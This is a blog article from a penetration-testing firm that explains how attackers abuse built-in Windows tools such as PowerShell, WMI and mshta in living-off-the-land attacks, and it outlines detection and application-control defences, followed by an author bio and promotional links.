A look at how attackers abuse built-in system tools for stealthy compromises with living off the land attacks (LotL)
Living off the Land (LotL) attacks (also referred to as “fileless attacks”) have been a persistent threat in cybersecurity for over a decade. These attacks involve malicious actors leveraging legitimate applications, system tools, and processes to conduct malicious activities, thereby evading traditional security measures. The term “Living off the Land” was coined around 2013, but the concept has been in practice for much longer. Over the years, the prevalence of LotL attacks has drastically increased. In recent years, for example, CrowdStrike reported in 2023 that 62% of detections involved LotL techniques. This continued into 2024, with a notable rise in cyberattacks employing living off the land attacks (LotL) methods, particularly by nation-state actors targeting critical infrastructure. The increasing sophistication and frequency of these attacks underscore the importance of robust security measures and continuous monitoring to detect and mitigate these kinds of threats.
According to the Center for Internet Security, fileless malware and living off the land attacks (LotL) techniques were projected to account for 50% of total attacks against enterprise environments in 2022, matching the frequency of file-based attacks for the first time. Furthermore, ReliaQuest reported that in 2023, 86.2% of critical customer incidents involved fileless malware, with many utilizing LotL techniques by abusing legitimate Windows binaries such as Rundll32, Msiexec, and Mshta.
One of the primary reasons LotL attacks are so effective is that they rely on commonly available system binaries and scripts that administrators and users legitimately require for day-to-day operations or are available by default. By blending in with genuine processes, the attacks often go unnoticed and mixed with regular system activities. PowerShell and Windows Management Instrumentation (WMI) are two of the most frequently abused tools: both are extremely powerful for configuration and automation, typically allowed in enterprise environments, and can operate without producing obvious file-based artifacts. For example, malicious actors can encode PowerShell commands using encoding such as Base64 or simple obfuscation techniques to conceal the script from security tools that rely on string detection or command-line scanning. Similarly, WMI can launch processes remotely, pulling malicious payloads directly in or out of memory and leaving minimal forensic evidence on disk. Malicious actors also exploit native Windows binaries, often collected in resources such as GTFOBins (for Unix-like systems) and LOLBAS (Living Off the Land Binaries and Scripts) for Windows, where executables like mshta.exe, rundll32.exe, and regsvr32.exe are repurposed to run malicious code. Even in highly locked-down environments with application whitelisting, these binaries frequently remain trusted and permitted, making them a valuable vector for privilege escalation, lateral movement, and persistence.
Real-world examples illustrate just how damaging such stealthy attacks can be. In the high-profile SolarWinds attack of 2020, adversaries injected malicious code into legitimate software updates for SolarWinds Orion, effectively disguising the initial infection route. Once inside, they leveraged trusted Windows processes to escalate privileges and pivot through networks. Similarly, the FIN7 cybercrime group, known for sophisticated banking and point-of-sale intrusions, used mshta.exe to execute JavaScript payloads. By taking advantage of a benign Windows binary, the malicious actors bypassed strict security policies that would have blocked a typical malware executable. Another group, APT29 (aka Cozy Bear), demonstrated how threat actors could rely on PowerShell and WMI to issue commands on compromised machines without ever dropping a traditional piece of malware onto the disk. In each case, the overarching theme was a reliance on the tools already installed and accepted by the target environment, avoiding classic indicators of compromise and making threat hunting much more challenging for defenders.
Defending against living off the land attacks (LotL) attacks requires a multi-pronged approach. Endpoint Detection and Response solutions still serve as a foundation, though they must be fine-tuned to recognize suspicious patterns within the legitimate processes. Modern EDR tools monitor script executions, interprocess communication, and unusual command-line arguments rather than depending on simple file-based scanning, which is further extended into behavioral or heuristic analysis. Organizations can layer additional defenses, such as Sysmon logging, to spot abnormal usage of PowerShell or built-in Windows binaries like rundll32.exe. Implementing an effective logging strategy, where security teams or managed security providers proactively parse and correlate events in near-real-time, helps identify anomalies indicative of malicious behavior. The MITRE ATT&CK framework provides an excellent reference for mapping known LotL techniques (often categorized under T1218 – System Binary Proxy Execution and T1059 – Command and Scripting Interpreter) to detection rules, ensuring that defenders systematically look for red flags across different phases of an attack.
Another critical measure is application control, sometimes achieved via solutions like AppLocker or Windows Defender Application Control (WDAC). While it can be challenging to block tools such as PowerShell and wmic.exe fully, organizations can enforce stricter policies or “constrained language mode” to limit script capabilities. For example, disabling PowerShell v2, which is outdated and often lacks certain security improvements, can significantly reduce an attacker’s options. However, it is crucial for security teams and system administrators to maintain an informed balance. Locking down or entirely removing tools that administrators genuinely need can be disruptive and cause friction with operations teams. Therefore, a carefully curated allowlist with continuous monitoring can enhance security without crippling day-to-day workflow.
Even with these measures in place, threat actors skilled in evasion techniques can still find cracks to exploit. Strict network segmentation, regular patching, and the principle of least privilege help reduce the blast radius when an attacker does succeed in abusing built-in tools. Compartmentalizing access to administrative utilities on a need-to-use basis can prevent threat actors from having free rein across the environment once they have compromised an initial endpoint. Likewise, logging suspicious command lines or high-risk processes in security information and event management (SIEM) platforms ensures that unusual spikes in usage, like an end-user suddenly running wmic.exe for remote process calls, stand out in routine security reviews or automated alerts.
Professional, manual (not AI-driven or automated) penetration testing and red teaming services can be instrumental in discovering gaps and fine-tuning defenses against LotL methods. Through real-world adversary simulation, expert red teams replicate the same tactics used by threat actors, identifying potential weaknesses in an organization’s defenses. For instance, Redbot Security (https://redbotsecurity.com), a firm specializing in manual penetration testing and red teaming, often examines how effectively an organization’s monitoring and restrictions respond to PowerShell-based attacks or LoLBin abuse. By emulating these techniques in a controlled environment, clients gain visibility into their detection and response capabilities before a real adversary tests them. This kind of proactive assessment is invaluable given the tricky nature of attacks that rely on legitimate processes, where advanced behavioral analytics and well-tuned rulesets are the primary means of detection.
Ultimately, LotL attack techniques are a constant game of cat and mouse between defenders and adversaries. As traditional malware detection becomes more effective, threat actors pivot to less conspicuous tactics to slip under the radar. Their success depends on blending into normal operations by hijacking tools with legitimate, day-to-day utility. EDR solutions, PowerShell security enhancements, restricted permissions, and robust logging will remain at the heart of any effective defense. However, it is equally critical that organizations regularly update their detection signatures and heuristics to keep pace with the latest attacker tradecraft. The growing catalog of GTFOBins and LOLBAS techniques should serve as a living checklist for defenders, reminding them that every system utility from archiving commands like tar, to .NET binaries capable of loading custom DLLs, might provide a foothold for a skilled adversary. Although no single security measure can completely thwart every fileless attack, a coordinated defensive strategy that layers detection, containment, and active threat hunting across all endpoints can dramatically reduce the likelihood of a successful breach. By staying vigilant, adopting best practices from frameworks like MITRE ATT&CK, and partnering with specialized penetration testing companies to test defenses, organizations can substantially mitigate the risk posed by this evolving and persistent threat.
Morgan Habecker is a results-driven cybersecurity executive and current COO at Redbot Security with a solid background in penetration testing and IT leadership. He has effectively managed cross-functional teams and refined security operations, leveraging hands-on vulnerability assessments alongside strategic oversight to enhance organizational defenses. His blend of technical expertise and leadership acumen has consistently delivered improved security postures and operational excellence throughout his career.
https://www.linkedin.com/in/morganhabecker/
Suggested Links:
Book a discovery call or request a rapid quote for services, tailored to your priorities and budget.
From manual testing of IT Networks and Web / Mobile Applications to advanced Red Team operations, Cloud Security, and OT-network assessments, Redbot Security delivers laser-focused, senior-level expertise, without breaking the bank.
America’s critical infrastructure faces rising cyber threats while legacy OT systems and shrinking federal support leave operators exposed. This article explores how Redbot Security uses Purdue and NIST methodologies to deliver safe, manual, and holistic OT network testing that protects ICS environments from real-world disruption.
SOC 2 compliance is now essential for building trust with clients. This step-by-step guide explains the process and how consulting services accelerate success.
Dynamic Application Security Testing (DAST) goes beyond tools. Discover how Redbot Security combines automated scanning with expert penetration testing for proven results.
Zero Trust requires strict verification of people as well as technology. Allowing foreign or crowdsourced hackers into your environment opens the door to sanctions violations, insider threats, and export-control breaches. Learn why U.S. companies should restrict penetration testing to vetted U.S.-based experts.
U.S. critical infrastructure is facing unprecedented cyber risk. This article explores ICS/SCADA security, the Purdue Model, and safe OT penetration testing practices. Discover why layered testing is essential and how Redbot Security helps organizations strengthen defenses against ransomware, remote access threats, and operational disruption.
Prompt injection attacks are a rising AI security risk in 2025. Learn how attackers manipulate LLMs to exfiltrate data, bypass safeguards, and cause real damage, and how Redbot Security uses penetration testing, OWASP frameworks, and risk assessments to defend against this evolving threat..
Redbot Security explains how RAG (Retrieval-Augmented Generation) Testing protects AI systems from prompt injection, data poisoning, and hallucinations
APIs power today’s digital economy but are prime targets for attackers. Redbot Security delivers advanced API penetration testing and compliance-ready reports for PCI DSS, HIPAA, and ISO 27001.
Political shutdowns are dismantling U.S. cyber defenses at the very moment attackers are escalating. Redbot Security warns why proactive penetration testing is critical in 2025.
Redbot Social